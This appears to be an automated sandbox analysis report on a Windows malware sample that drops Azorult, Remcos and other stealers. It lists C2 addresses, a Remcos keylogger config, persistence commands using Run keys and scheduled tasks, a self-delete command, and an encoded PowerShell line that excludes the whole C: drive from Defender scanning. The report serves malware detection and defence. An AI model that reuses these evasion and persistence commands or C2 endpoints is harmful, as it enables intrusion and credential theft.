Analysis
- max time kernel: 149s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 28/05/2022, 14:11
Static task: static1
Behavioral task: behavioral1
Sample: 0a7b32e75a01764ef5389a1d9e72ed63.exe
Resource: win7-20220414-en
General
- Target: 0a7b32e75a01764ef5389a1d9e72ed63.exe
- Size: 40KB
- MD5: 0a7b32e75a01764ef5389a1d9e72ed63
- SHA1: 871366f3573c3349e9dc7b67fef1ef575815c154
- SHA256: 34ba222ef969f09ecca5506cbada7c346469a96a6af0cdd21146d4435196deda
- SHA512: f19a7d56a825b59d2841a4f10db940458d3255239e15bb9bbe1376e1fc47d4c97aef09d4e7ecd5a3a35fca44ec92edf60edd4a07ef1845d679c3bd4fc8fe43ba
Malware Config
- Extracted: arkei (Default)
- Extracted: azorult
  C2: http://195.245.112.115/index.php
- Extracted: remcos (05282022)
  C2: nikahuve.ac.ug:6968, kalskala.ac.ug:6968, tuekisaa.ac.ug:6968, parthaha.ac.ug:6968
  audio_folder: MicRecords
  audio_path: %AppData%
  audio_record_time: 5
  connect_delay: 0
  connect_interval: 1
  copy_file: remcos.exe
  copy_folder: Remcos
  delete_file: false
  hide_file: false
  hide_keylog_file: true
  install_flag: false
  install_path: %AppData%
  keylog_crypt: true
  keylog_file: scxs.dat
  keylog_flag: false
  keylog_folder: forbas
  keylog_path: %AppData%
  mouse_option: false
  mutex: cvxyttydfsgbghfgfhtd-SPVWAO
  screenshot_crypt: false
  screenshot_flag: false
  screenshot_folder: Screenshots
  screenshot_path: %AppData%
  screenshot_time: 10
  startup_value: Remcos
  take_screenshot_option: false
  take_screenshot_time: 5
  take_screenshot_title: notepad;solitaire;
Signatures
- Azorult
  An information stealer that was first discovered in 2016, targeting browsing history and passwords.
- suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M15
- suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
- Downloads MZ/PE file
- Executes dropped EXE (18 IoCs)
  pid   Process
  4824  Iioozcrscrdqdprjojgormars2.exe
  2276  6ICxGqOO.exe
  5012  qbTw45ig.exe
  2584  4dARKu85.exe
  4816  RcL99cNy.exe
  2164  Iioozcrscrdqdprjojgormars2.exe
  4016  6ICxGqOO.exe
  4608  6ICxGqOO.exe
  3740  6ICxGqOO.exe
  3388  6ICxGqOO.exe
  1476  6ICxGqOO.exe
  1340  4dARKu85.exe
  2852  azne.exe
  1412  azne.exe
  2460  azne.exe
  3764  azne.exe
  2824  oobeldr.exe
  1332  oobeldr.exe
- Checks computer location settings (2 TTPs, 8 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                     Process
  Key value queried  \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation  azne.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation  0a7b32e75a01764ef5389a1d9e72ed63.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation  Iioozcrscrdqdprjojgormars2.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation  0a7b32e75a01764ef5389a1d9e72ed63.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation  6ICxGqOO.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation  qbTw45ig.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation  RcL99cNy.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation  Iioozcrscrdqdprjojgormars2.exe
- Loads dropped DLL (9 IoCs)
  pid   Process
  4564  0a7b32e75a01764ef5389a1d9e72ed63.exe  (3 entries)
  1476  6ICxGqOO.exe  (4 entries)
  2164  Iioozcrscrdqdprjojgormars2.exe  (2 entries)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Adds Run key to start application (2 TTPs, 2 IoCs)
  description      ioc                                                                                                                                          Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhsza = "\"C:\\Users\\Admin\\AppData\\Roaming\\dllhsza.exe\""    qbTw45ig.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rcholaza = "\"C:\\Users\\Admin\\AppData\\Roaming\\rcholaza.exe\""  RcL99cNy.exe
- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Suspicious use of SetThreadContext (7 IoCs)
  description                             pid   Process                               procid_target
  PID 4060 set thread context of 4564     4060  0a7b32e75a01764ef5389a1d9e72ed63.exe  92
  PID 4824 set thread context of 2164     4824  Iioozcrscrdqdprjojgormars2.exe        110
  PID 2276 set thread context of 1476     2276  6ICxGqOO.exe                          115
  PID 2584 set thread context of 1340     2584  4dARKu85.exe                          120
  PID 4816 set thread context of 4240     4816  RcL99cNy.exe                          133
  PID 2852 set thread context of 3764     2852  azne.exe                              136
  PID 2824 set thread context of 1332     2824  oobeldr.exe                           138
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 4 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                               Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      6ICxGqOO.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  6ICxGqOO.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      Iioozcrscrdqdprjojgormars2.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  Iioozcrscrdqdprjojgormars2.exe
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  1688  schtasks.exe
  1884  schtasks.exe
- Delays execution with timeout.exe (7 IoCs)
  pid   Process
  4336  timeout.exe
  2192  timeout.exe
  2728  timeout.exe
  2384  timeout.exe
  3984  timeout.exe
  2712  timeout.exe
  3704  timeout.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid   Process
  4060  0a7b32e75a01764ef5389a1d9e72ed63.exe  (14 entries)
  4824  Iioozcrscrdqdprjojgormars2.exe        (2 entries)
  2276  6ICxGqOO.exe                          (18 entries)
  3500  powershell.exe                        (2 entries)
  3676  powershell.exe                        (2 entries)
  1476  6ICxGqOO.exe                          (2 entries)
  5012  qbTw45ig.exe                          (1 entry)
  4816  RcL99cNy.exe                          (10 entries)
  2852  azne.exe                              (10 entries)
  2684  Explorer.EXE                          (3 entries)
- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  pid   Process
  2684  Explorer.EXE
- Suspicious behavior: MapViewOfSection (2 IoCs)
  pid   Process
  2584  4dARKu85.exe
  2824  oobeldr.exe
- Suspicious use of AdjustPrivilegeToken (17 IoCs)
  description                      pid   Process
  Token: SeDebugPrivilege          4060  0a7b32e75a01764ef5389a1d9e72ed63.exe
  Token: SeDebugPrivilege          4824  Iioozcrscrdqdprjojgormars2.exe
  Token: SeDebugPrivilege          2276  6ICxGqOO.exe
  Token: SeDebugPrivilege          4816  RcL99cNy.exe
  Token: SeDebugPrivilege          5012  qbTw45ig.exe
  Token: SeDebugPrivilege          3500  powershell.exe
  Token: SeDebugPrivilege          3676  powershell.exe
  Token: SeShutdownPrivilege       2684  Explorer.EXE
  Token: SeCreatePagefilePrivilege 2684  Explorer.EXE
  Token: SeShutdownPrivilege       2684  Explorer.EXE
  Token: SeCreatePagefilePrivilege 2684  Explorer.EXE
  Token: SeDebugPrivilege          2852  azne.exe
  Token: SeDebugPrivilege          2684  Explorer.EXE
  Token: SeShutdownPrivilege       2684  Explorer.EXE
  Token: SeCreatePagefilePrivilege 2684  Explorer.EXE
  Token: SeShutdownPrivilege       2684  Explorer.EXE
  Token: SeCreatePagefilePrivilege 2684  Explorer.EXE
- Suspicious use of SetWindowsHookEx (3 IoCs)
  pid   Process
  2584  4dARKu85.exe
  4240  MSBuild.exe
  2824  oobeldr.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  description                        pid   Process                               procid_target
  PID 4060 wrote to memory of 4672   4060  0a7b32e75a01764ef5389a1d9e72ed63.exe  79   (3 entries)
  PID 4672 wrote to memory of 4336   4672  cmd.exe                               81   (3 entries)
  PID 4060 wrote to memory of 4824   4060  0a7b32e75a01764ef5389a1d9e72ed63.exe  88   (3 entries)
  PID 4060 wrote to memory of 3344   4060  0a7b32e75a01764ef5389a1d9e72ed63.exe  89   (3 entries)
  PID 4060 wrote to memory of 4764   4060  0a7b32e75a01764ef5389a1d9e72ed63.exe  90   (3 entries)
  PID 4060 wrote to memory of 2480   4060  0a7b32e75a01764ef5389a1d9e72ed63.exe  91   (3 entries)
  PID 4060 wrote to memory of 4564   4060  0a7b32e75a01764ef5389a1d9e72ed63.exe  92   (9 entries)
  PID 4824 wrote to memory of 3552   4824  Iioozcrscrdqdprjojgormars2.exe        93   (3 entries)
  PID 3552 wrote to memory of 2192   3552  cmd.exe                               95   (3 entries)
  PID 4564 wrote to memory of 2276   4564  0a7b32e75a01764ef5389a1d9e72ed63.exe  97   (3 entries)
  PID 2276 wrote to memory of 4188   2276  6ICxGqOO.exe                          98   (3 entries)
  PID 4564 wrote to memory of 5012   4564  0a7b32e75a01764ef5389a1d9e72ed63.exe  100  (2 entries)
  PID 4188 wrote to memory of 2728   4188  cmd.exe                               101  (3 entries)
  PID 4564 wrote to memory of 2584   4564  0a7b32e75a01764ef5389a1d9e72ed63.exe  102  (3 entries)
  PID 4564 wrote to memory of 4816   4564  0a7b32e75a01764ef5389a1d9e72ed63.exe  103  (3 entries)
  PID 5012 wrote to memory of 4200   5012  qbTw45ig.exe                          105  (2 entries)
  PID 4816 wrote to memory of 2636   4816  RcL99cNy.exe                          106  (3 entries)
  PID 4200 wrote to memory of 2384   4200  cmd.exe                               108  (2 entries)
  PID 2636 wrote to memory of 3984   2636  cmd.exe                               109  (3 entries)
  PID 4824 wrote to memory of 2164   4824  Iioozcrscrdqdprjojgormars2.exe        110  (4 entries)
Processes
- C:\Windows\Explorer.EXE (PID 2684)
  cmdline: C:\Windows\Explorer.EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe (PID 4060)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe"
    - Checks computer location settings
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (PID 4672)
      cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 20
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\timeout.exe (PID 4336)
        cmdline: timeout /t 20
        - Delays execution with timeout.exe
    - C:\Users\Admin\AppData\Local\Temp\Iioozcrscrdqdprjojgormars2.exe (PID 4824)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Iioozcrscrdqdprjojgormars2.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (PID 3552)
        cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 20
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\timeout.exe (PID 2192)
          cmdline: timeout /t 20
          - Delays execution with timeout.exe
      - C:\Users\Admin\AppData\Local\Temp\Iioozcrscrdqdprjojgormars2.exe (PID 2164)
        cmdline: C:\Users\Admin\AppData\Local\Temp\Iioozcrscrdqdprjojgormars2.exe
        - Executes dropped EXE
        - Checks computer location settings
        - Loads dropped DLL
        - Checks processor information in registry
        - C:\Users\Admin\AppData\Roaming\azne.exe (PID 2852)
          cmdline: "C:\Users\Admin\AppData\Roaming\azne.exe"
          - Executes dropped EXE
          - Checks computer location settings
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - C:\Windows\SysWOW64\cmd.exe (PID 2428)
            cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 20
            - C:\Windows\SysWOW64\timeout.exe (PID 3704)
              cmdline: timeout /t 20
              - Delays execution with timeout.exe
          - C:\Users\Admin\AppData\Roaming\azne.exe (PID 1412)
            cmdline: C:\Users\Admin\AppData\Roaming\azne.exe
            - Executes dropped EXE
          - C:\Users\Admin\AppData\Roaming\azne.exe (PID 2460)
            cmdline: C:\Users\Admin\AppData\Roaming\azne.exe
            - Executes dropped EXE
          - C:\Users\Admin\AppData\Roaming\azne.exe (PID 3764)
            cmdline: C:\Users\Admin\AppData\Roaming\azne.exe
            - Executes dropped EXE
        - C:\Windows\SysWOW64\cmd.exe (PID 3608)
          cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Iioozcrscrdqdprjojgormars2.exe" & exit
          - C:\Windows\SysWOW64\timeout.exe (PID 2712)
            cmdline: timeout /t 5
            - Delays execution with timeout.exe
    - C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe (PID 3344)
      cmdline: C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe
    - C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe (PID 4764)
      cmdline: C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe
    - C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe (PID 2480)
      cmdline: C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe
    - C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe (PID 4564)
      cmdline: C:\Users\Admin\AppData\Local\Temp\0a7b32e75a01764ef5389a1d9e72ed63.exe
      - Checks computer location settings
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe (PID 2276)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe (PID 4188)
          cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 20
          - Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\timeout.exe (PID 2728)
            cmdline: timeout /t 20
            - Delays execution with timeout.exe
        - C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe (PID 4016)
          cmdline: C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe
          - Executes dropped EXE
        - C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe (PID 4608)
          cmdline: C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe
          - Executes dropped EXE
        - C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe (PID 3740)
          cmdline: C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe
          - Executes dropped EXE
        - C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe (PID 3388)
          cmdline: C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe
          - Executes dropped EXE
        - C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe (PID 1476)
          cmdline: C:\Users\Admin\AppData\Local\Temp\6ICxGqOO.exe
          - Executes dropped EXE
          - Loads dropped DLL
          - Checks processor information in registry
          - Suspicious behavior: EnumeratesProcesses
      - C:\Users\Admin\AppData\Local\Temp\qbTw45ig.exe (PID 5012)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\qbTw45ig.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Adds Run key to start application
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - C:\Windows\System32\cmd.exe (PID 4200)
          cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 20
          - Suspicious use of WriteProcessMemory
          - C:\Windows\system32\timeout.exe (PID 2384)
            cmdline: timeout /t 20
            - Delays execution with timeout.exe
        - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3676)
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
          (the -enc argument is UTF-16LE base64 and decodes to: Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\', i.e. a Microsoft Defender exclusion for the whole C: drive)
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      - C:\Users\Admin\AppData\Local\Temp\4dARKu85.exe (PID 2584)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\4dARKu85.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of SetWindowsHookEx
        - C:\Users\Admin\AppData\Local\Temp\4dARKu85.exe (PID 1340)
          cmdline: "C:\Users\Admin\AppData\Local\Temp\4dARKu85.exe"
          - Executes dropped EXE
          - C:\Windows\SysWOW64\schtasks.exe (PID 1688)
            cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
            - Creates scheduled task(s)
      - C:\Users\Admin\AppData\Local\Temp\RcL99cNy.exe (PID 4816)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\RcL99cNy.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Adds Run key to start application
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe (PID 2636)
          cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 20
          - Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\timeout.exe (PID 3984)
            cmdline: timeout /t 20
            - Delays execution with timeout.exe
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3500)
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==
          (same encoded command as PID 3676: Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\')
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (PID 1000)
          cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (PID 2644)
          cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (PID 4240)
          cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          - Suspicious use of SetWindowsHookEx
- C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe (PID 2824)
  cmdline: C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe (PID 1332)
    cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
    - Executes dropped EXE
    - C:\Windows\SysWOW64\schtasks.exe (PID 1884)
      cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
      - Creates scheduled task(s)
Downloads